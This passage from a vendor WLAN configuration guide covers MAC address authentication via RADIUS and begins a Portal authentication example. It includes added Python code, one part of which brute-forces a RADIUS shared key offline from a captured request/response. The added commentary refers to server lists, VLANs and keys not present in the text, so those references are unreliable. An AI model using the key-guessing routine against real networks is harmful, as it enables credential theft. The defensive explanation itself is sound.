ap id 201 type-id 19 mac 60de-4476-e360
region-id 2
ap id 202 type-id 19 mac 60de-4476-e380
region-id 2
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name area1 id 1
wlan-ess 1
ssid city-wlan
user-isolate
traffic-profile id 1
security-profile id 1
service-vlan 101
service-set name area2 id 2
wlan-ess 2
ssid city-wlan
user-isolate
traffic-profile id 1
security-profile id 1
service-vlan 102
radio-profile name radio id 1
channel-mode fixed
power-mode fixed
wmm-profile id 1
ap 101 radio 0
radio-profile id 1
power-level 10
service-set id 1 wlan 1
ap 101 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10
service-set id 1 wlan 1
ap 102 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
service-set id 1 wlan 1
ap 102 radio 1
radio-profile id 1
channel 20MHz 161
power-level 10
service-set id 1 wlan 1
ap 201 radio 0
radio-profile id 1
power-level 10
service-set id 2 wlan 1
ap 201 radio 1
radio-profile id 1
channel 20MHz 153
power-level 10
service-set id 2 wlan 1
ap 202 radio 0
radio-profile id 1
channel 20MHz 6
power-level 10
service-set id 2 wlan 1
ap 202 radio 1
radio-profile id 1
channel 20MHz 161
power-level 10
service-set id 2 wlan 1
#
return

15.6 Example for Configuring MAC Address Authentication on the Wireless Side

MAC Address Authentication on the Wireless Side Overview
MAC address authentication controls a terminal's network access based on the terminal's MAC
address. The terminal does not need any client software and the user does not enter a user
name or password: when the terminal associates with the WLAN, the access device sends the
terminal's MAC address to the RADIUS server as the credential, and the terminal can use
network resources only after the RADIUS server accepts it. This makes MAC address
authentication suitable for devices on which an authentication client cannot be installed,
such as wireless printers and phones. Because the only credential is a MAC address, which is
visible on the air and can be copied onto another device, MAC address authentication
identifies a device rather than a user.

Configuration Notes
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same. In
direct forwarding mode, you are advised not to configure the management VLAN and service
VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. Without port isolation, large numbers of broadcast packets are flooded in
the VLANs, and WLAN users on different APs can communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l The following table lists applicable products and versions.

Table 15-13 Applicable products and versions

Software Version  Product Model  AP Model and Version
V200R005C00       S12700         V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN,
                                 AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN,
                                 AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
                                 AP7110DN-AGN, AP7110SN-GN
V200R006C00       S12700         V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN,
                                 AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN,
                                 AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
                                 AP7110DN-AGN, AP7110SN-GN
V200R007C00       S12700         V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN,
                                 AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN,
                                 AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
                                 AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                 V200R005C20: AP7030DE, AP9330DN
V200R008C00       S12700         V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN,
                                 AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN,
                                 AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
                                 AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                 V200R005C20: AP7030DE, AP9330DN
                                 V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-5, the enterprise's AC connects to the egress gateway (Router) and
RADIUS server, and connects to the AP through SwitchA. The WLAN with the SSID of test
is available for wireless users and terminals to access network resources. The gateway also
functions as a DHCP server to provide IP addresses on the 10.10.10.0/24 network segment for
STAs. The AC controls and manages STAs.
The WLAN authentication client cannot be installed on wireless devices providing public
services, such as wireless printers and phones, so MAC address authentication is used. The
RADIUS server authenticates wireless devices using their MAC addresses. Users do not need to
perform any authentication operation when STAs access the WLAN, which facilitates the use of
WLAN services.

Figure 15-5 Networking diagram for configuring MAC address authentication on the wireless
side

[Figure: Router (gateway, to the Internet) connects through its GE2/0/0 to GE1/0/2 of the
AC; the AC connects through GE1/0/3 to the RADIUS Server 10.12.10.1:1812 and through
GE1/0/1 to GE0/0/2 of SwitchA; SwitchA connects through GE0/0/1 to the AP; two STAs
associate with the AP.]

Data Planning

Table 15-14 Data planning

Configuration Item             Data
WLAN service                   Open system authentication + non-encryption
Management VLAN                VLAN 100
Service VLAN                   VLAN 101
Source interface on the AC     VLANIF 100: 192.168.10.1/24
AC carrier ID/AC ID            Other/1
AP region ID                   10
Service set                    l SSID: test
                               l Data forwarding mode: tunnel forwarding
SwitchA VLAN                   VLAN 100
DHCP server                    l IP addresses that the AC assigns to APs:
                                 192.168.10.2 to 192.168.10.254/24
                               l IP addresses that Router assigns to STAs:
                                 10.10.10.2 to 10.10.10.254/24
Gateway for the AP             VLANIF 100: 192.168.10.1/24
Gateway for STAs               VLANIF 101: 10.10.10.1/24
RADIUS authentication          l IP address: 10.12.10.1
parameters                     l Port number: 1812
                               l Shared key: 123456
                               l AAA domain: huawei.com
MAC address of a STA           0011-2233-4455

Configuration Roadmap
1. Configure WLAN basic services so that STAs can access the WLAN. This example uses
default configurations.
2. Configure a RADIUS server template and apply it to an AAA domain.
3. Configure MAC address authentication on the WLAN-ESS interface to authenticate
STAs.
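The RADIUS exchange that both the RADIUS server template of Step 3 in the preceding Portal example and the RADIUS parameters in Table 15-14 depend on, as an added example in Python (not code from the Huawei document or its products): how a NAS such as the AC hides the credential in an Access-Request with the shared key, how it must verify the Response Authenticator of the server's reply before honouring an Access-Accept, and why a short key such as 123456 can be recovered from a single captured exchange. Assumptions not stated on the page: the NAS sends the STA MAC address, written as 12 hex digits without separators, as both User-Name and User-Password (Huawei's MAC-authentication user name format and password policy are configurable and are not shown here); the NAS IP is the AC's 10.12.10.2; and the Request Authenticator is a fixed constructed value, where a real NAS draws 16 random bytes.

```python
"""RADIUS shared-key arithmetic (RFC 2865) as a NAS and an eavesdropper see it.
Added example; assumptions are marked in comments."""
import hashlib
import hmac
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, NAS_IP_ADDRESS = 1, 2, 4
HEADER_LEN = 20  # Code(1) + Identifier(1) + Length(2) + Authenticator(16)


def attr(atype, value):
    """Encode one attribute as Type, Length, Value (RFC 2865, section 5)."""
    return struct.pack("!BB", atype, len(value) + 2) + value


def hide_password(password, secret, req_auth):
    """User-Password hiding (RFC 2865, section 5.2): pad to 16-byte blocks and
    XOR each block with MD5(secret + previous ciphertext block); the first
    'previous block' is the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out, prev = out + block, block
    return out


def reveal_password(hidden, secret, req_auth):
    """Server-side inverse of hide_password(); strips the zero padding."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        out, prev = out + bytes(c ^ m for c, m in zip(block, mask)), block
    return out.rstrip(b"\x00")


def mac_user_name(mac):
    """Assumed credential form for MAC authentication: '0011-2233-4455' -> b'001122334455'."""
    return mac.replace("-", "").lower().encode()


def build_mac_auth_request(identifier, req_auth, sta_mac, secret, nas_ip):
    """Access-Request the NAS sends for a MAC-authenticated STA (assumed: the
    MAC is both User-Name and User-Password)."""
    name = mac_user_name(sta_mac)
    attrs = (attr(USER_NAME, name)
             + attr(USER_PASSWORD, hide_password(name, secret, req_auth))
             + attr(NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, HEADER_LEN + len(attrs))
    return header + req_auth + attrs


def response_authenticator(code, identifier, req_auth, attrs, secret):
    """RFC 2865, section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, identifier, HEADER_LEN + len(attrs))
    return hashlib.md5(header + req_auth + attrs + secret).digest()


def build_response(code, identifier, req_auth, attrs, secret):
    """Reply as the RADIUS server builds it (Access-Accept when code == 2)."""
    header = struct.pack("!BBH", code, identifier, HEADER_LEN + len(attrs))
    return header + response_authenticator(code, identifier, req_auth, attrs, secret) + attrs


def verify_response(packet, req_auth, secret):
    """What the NAS must check before acting on a reply: recompute the
    Response Authenticator with its own key and compare in constant time.
    A forged Accept from a host without the key, or a reply whose attributes
    were altered in transit, fails here."""
    if len(packet) < HEADER_LEN:
        return False
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet):
        return False
    expected = response_authenticator(code, identifier, req_auth, packet[HEADER_LEN:], secret)
    return hmac.compare_digest(expected, packet[4:HEADER_LEN])


def guess_secret(response, req_auth, candidates):
    """The same check turned against the operator: an eavesdropper holding one
    request/response pair can test key guesses offline, so a six-digit key
    such as 123456 falls within a million MD5 calls."""
    for guess in candidates:
        if verify_response(response, req_auth, guess.encode()):
            return guess
    return None


if __name__ == "__main__":
    # Constructed values: key and STA MAC from Table 15-14, fixed authenticator.
    secret, req_auth = b"123456", bytes(range(16))
    request = build_mac_auth_request(7, req_auth, "0011-2233-4455", secret, "10.12.10.2")
    accept = build_response(ACCESS_ACCEPT, 7, req_auth, b"", secret)
    print("request bytes:", len(request), "accept valid:", verify_response(accept, req_auth, secret))
    print("recovered key:", guess_secret(accept, req_auth, (str(i).zfill(6) for i in range(1000000))))
```

The two halves of the example point in opposite directions. verify_response() is the check that makes the weight/backup server lists above safe to use: a spoofed Access-Accept from an address in the server list is rejected unless the sender holds the key. guess_secret() is the same computation run by whoever captured the UDP exchange on VLAN 300 or VLAN 103, which is why the sample keys Admin@123 and 123456 should be treated as placeholders and replaced with long random keys, one per NAS where the server supports it.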

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.

# Add GE0/0/1 that connects SwitchA to the AP to management VLAN 100 and add GE0/0/2
that connects SwitchA to the AC to the same VLAN.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100 101
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit


Step 2 Configure the AC to communicate with the upstream device.


# Configure VLANIF 101 (service VLAN), VLANIF 102, and VLANIF 103.
[AC] vlan batch 101 102 103
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.10.10.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.11.10.2 24
[AC-Vlanif102] quit
[AC] interface vlanif 103
[AC-Vlanif103] ip address 10.12.10.2 24
[AC-Vlanif103] quit

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

# Add GE1/0/3 that connects the AC to the RADIUS server to VLAN 103.
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 103
[AC-GigabitEthernet1/0/3] quit

# On the AC, configure a static route.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.11.10.1

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.
# Configure the AC to assign an IP address to the AP from an interface IP address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.11.10.1 //Set the DHCP server address for DHCP relay to 10.11.10.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.


<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.10.10.1
[Router-ip-pool-sta] network 10.10.10.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.11.10.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102


[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.10.10.0 24 10.11.10.2 //Configure a route on the Router destined for the network segment 10.10.10.0/24.

Step 4 Configure RADIUS authentication.


1. Configure a RADIUS server template, an AAA authentication scheme, and domain
information.
NOTE
The STA sends its MAC address as the user name to the RADIUS server for authentication, so the
AC needs to be disabled from adding a domain name to the user name (default setting).
[AC] radius-server template radius_huawei
[AC-radius-radius_huawei] radius-server authentication 10.12.10.1 1812
[AC-radius-radius_huawei] radius-server shared-key cipher 123456 //The default key is huawei.
[AC-radius-radius_huawei] quit
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei
[AC-aaa-authen-radius_huawei] authentication-mode radius
[AC-aaa-authen-radius_huawei] quit
[AC-aaa] domain huawei.com
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei
[AC-aaa-domain-huawei.com] radius-server radius_huawei
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

2. Globally configure user names in MAC address authentication without the delimiter "-"
(default setting).
3. Test whether a STA can be authenticated using RADIUS authentication. In MAC address
authentication, the STA's MAC address is used as both the user name and the password.
[AC] test-aaa 001122334455 001122334455 radius-template radius_huawei
Info: Account test succeed.

Step 5 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 6 Manage the AP on the AC.


# Check the AP type ID after obtaining the MAC address of the AP.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN


28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
AP offline based on the AP type ID. Assume that the AP type is AP6010DN-AGN, and the
MAC address of the AP is 60de-4476-e360.
[AC-wlan-view] ap id 0 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-0] quit

# Configure an AP region and add the AP to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 0
[AC-wlan-ap-0] region-id 10 //Add AP to region 10.
[AC-wlan-ap-0] quit

# After powering on the AP, run the display ap all command on the AC to check the AP
running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
0 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-0
------------------------------------------------------------------------------
Total number: 1,printed: 1

Step 7 Configure WLAN service parameters.


# Create a WMM profile named wmm.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit


# Create a security profile named security.


[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic.


[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Set the SSID name to test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the forwarding mode to tunnel forwarding.
[AC-wlan-service-set-test] quit

Step 8 Configure MAC address authentication on the WLAN-ESS interface.


[AC-wlan-view] quit
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] authentication mac-authen
[AC-Wlan-Ess1] domain name huawei.com force
[AC-Wlan-Ess1] permit-domain name huawei.com
[AC-Wlan-Ess1] quit
[AC] wlan

Step 9 Configure a VAP and deliver VAP parameters to the AP.


# Configure a VAP.
[AC-wlan-view] ap 0 radio 0
[AC-wlan-radio-0/0] radio-profile name radio //Bind the radio template to a radio.
[AC-wlan-radio-0/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-0/0] quit

# Commit the configuration.


[AC-wlan-view] commit ap 0
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 10 Verify the configuration.


• The WLAN with SSID test is available for STAs connected to the AP.
• After the WLAN function is enabled on wireless devices, they can access the WLAN and provide public services.
• After the STA connects to the WLAN, authentication is performed automatically. You can directly access the WLAN.

----End

Configuration Files
• Configuration file of SwitchA
#
sysname SwitchA


#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 100
#
return
• Configuration file of the Router
#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.10.10.1
network 10.10.10.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.11.10.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.10.10.0 255.255.255.0 10.11.10.2
#
return
• Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 103
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
radius-server template radius_huawei
radius-server authentication 10.12.10.1 1812 weight 80
radius-server shared-key cipher %#%#Dh.LR>nZA,K_(/~3#i!@a;6}Vk\T_9`ocp<^c"q%%#%
undo radius-server user-name domain-included
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
domain huawei.com
authentication-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.10.10.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.11.10.1
#


interface Vlanif102
ip address 10.11.10.2 255.255.255.0
#
interface Vlanif103
ip address 10.12.10.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 103
#
interface WLAN-ESS1
port trunk allow-pass vlan 101
authentication mac-authen
permit-domain name huawei.com
domain name huawei.com force
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 0 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
wmm-profile id 1
ap 0 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return
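The configuration file above is also what an auditor reads back from the AC with display current-configuration. The following added Python example, not a Huawei tool, parses a VRP-style configuration file into its "#"-delimited blocks and reports RADIUS templates whose shared key is missing or not stored with cipher, and WLAN-ESS interfaces that lack an authentication mode, a forced and permitted AAA domain, or (for authentication portal, as in the next example) a bound web-auth-server. The embedded sample is a constructed, trimmed copy of this AC configuration with a placeholder cipher text and an extra, unprotected WLAN-ESS2.

```python
from typing import List

# Constructed sample: a trimmed copy of the AC configuration file above, with a placeholder in
# place of the page's cipher text and an extra WLAN-ESS2 that has no authentication at all.
SAMPLE_AC_CONFIG = """\
#
sysname AC
#
radius-server template radius_huawei
 radius-server authentication 10.12.10.1 1812 weight 80
 radius-server shared-key cipher %#%#CIPHERTEXT-PLACEHOLDER%#%#
 undo radius-server user-name domain-included
#
aaa
 authentication-scheme radius_huawei
  authentication-mode radius
 domain huawei.com
  authentication-scheme radius_huawei
  radius-server radius_huawei
#
interface WLAN-ESS1
 port trunk allow-pass vlan 101
 authentication mac-authen
 permit-domain name huawei.com
 domain name huawei.com force
#
interface WLAN-ESS2
 port trunk allow-pass vlan 101
#
return
"""


def parse_blocks(text: str) -> List[List[str]]:
    """Split a VRP configuration file into '#'-delimited blocks; the first line of each
    block is its header (e.g. 'interface WLAN-ESS1'). Indentation is not relied upon."""
    blocks: List[List[str]] = []
    current: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                blocks.append(current)
            current = []
        elif line and line != "return":
            current.append(line)
    if current:
        blocks.append(current)
    return blocks


def audit_ac_config(text: str) -> List[str]:
    """Return findings for the RADIUS templates and WLAN-ESS interfaces in an AC configuration."""
    findings: List[str] = []
    blocks = parse_blocks(text)
    # AAA domains defined under 'aaa', so a forced domain can be checked for existence.
    domains = {ln.split()[1] for b in blocks if b[0] == "aaa" for ln in b if ln.startswith("domain ")}
    for b in blocks:
        head, body = b[0], b[1:]
        if head.startswith("radius-server template "):
            name = head.split()[-1]
            keys = [ln for ln in body if ln.startswith("radius-server shared-key")]
            if not keys:
                findings.append(f"{name}: no shared key configured, the device default is in use")
            elif " cipher " not in keys[0]:
                findings.append(f"{name}: shared key is not stored with 'cipher'")
            if not any(ln.startswith("radius-server authentication ") for ln in body):
                findings.append(f"{name}: no authentication server address")
        elif head.startswith("interface WLAN-ESS"):
            name = head.split()[1]
            mode = next((ln.split()[1] for ln in body if ln.startswith("authentication ")), None)
            if mode is None:
                findings.append(f"{name}: no authentication mode configured, STAs are not authenticated")
                continue
            forced = next((ln.split()[2] for ln in body
                           if ln.startswith("domain name ") and ln.endswith(" force")), None)
            if forced is None:
                findings.append(f"{name}: no forced domain ('domain name <domain> force')")
            elif forced not in domains:
                findings.append(f"{name}: forced domain {forced} is not defined under aaa")
            if not any(ln.startswith("permit-domain name ") for ln in body):
                findings.append(f"{name}: no permit-domain restriction")
            if mode == "portal" and not any(ln.startswith("web-auth-server ") for ln in body):
                findings.append(f"{name}: portal authentication without a bound web-auth-server")
    return findings


if __name__ == "__main__":
    for finding in audit_ac_config(SAMPLE_AC_CONFIG):
        print(finding)
```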

15.7 Example for Configuring Portal Authentication on the Wireless Side
Portal Authentication on the Wireless Side Overview
MAC address authentication controls a user's network access rights based on the user's
interface and MAC address. The user does not need to install any client software. The device
starts authenticating a user when detecting the user's MAC address for the first time on the
interface where MAC address authentication has been enabled. During the authentication
process, the user does not need to enter a user name or password.


Configuration Notes
• In the service data forwarding mode, the management VLAN and the service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are advised not to
configure the same VLAN as both the management VLAN and the service VLAN.
• If direct forwarding is used, configure port isolation on the interface that directly
connects to APs. If port isolation is not configured, many broadcast packets will be
transmitted in the VLANs, or WLAN users on different APs can directly communicate at Layer 2.
• Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and the upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and the upper-layer network is added to the service VLAN.
• How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
• The following table lists applicable products and versions.

Table 15-15 Applicable products and versions

Software Version   Product Model   AP Model and Version
V200R005C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
V200R008C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
                                   V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-6, the AC deployed in an open place connects to the egress gateway
(Router), RADIUS server, and Portal server, and connects to the AP through SwitchA. The
WLAN with the SSID of test is available for users to access network resources. The gateway
also functions as a DHCP server to provide IP addresses on the 10.10.10.0/24 network
segment for STAs. The AC controls and manages STAs.
Because the WLAN is open to users, there are potential security risks. To facilitate access to
the WLAN, use the default security policy on the AC. STAs are not authenticated and data is
not encrypted. To uniformly manage STAs and allow only paid users to access the Internet,
configure Portal authentication on the AC. Any user who attempts to access the Internet is
redirected to the Portal authentication web page. A paid user connects to the Internet after
entering the user name and password, and the RADIUS server starts accounting. An unpaid
user must pay for the WLAN service and use the obtained user name and password to
complete Portal authentication. Generally, the Portal authentication web page provides the
paying function.


Figure 15-6 Networking diagram for configuring Portal authentication on the wireless side
[Figure: the Router (gateway, GE2/0/0) connects to the Internet and to AC GE1/0/2; the Portal Server (10.13.10.1) connects to AC GE1/0/4; the RADIUS Server (10.12.10.1, authentication port 1812, accounting port 1813) connects to AC GE1/0/3; AC GE1/0/1 connects to SwitchA GE0/0/2; SwitchA GE0/0/1 connects to the AP, which serves the STAs.]

Data planning

Table 15-16 Data planning

Configuration Item               Data
WLAN service                     Open system authentication + non-encryption
Management VLAN                  VLAN 100
Service VLAN                     VLAN 101
Source interface on the AC       VLANIF 100: 192.168.10.1/24
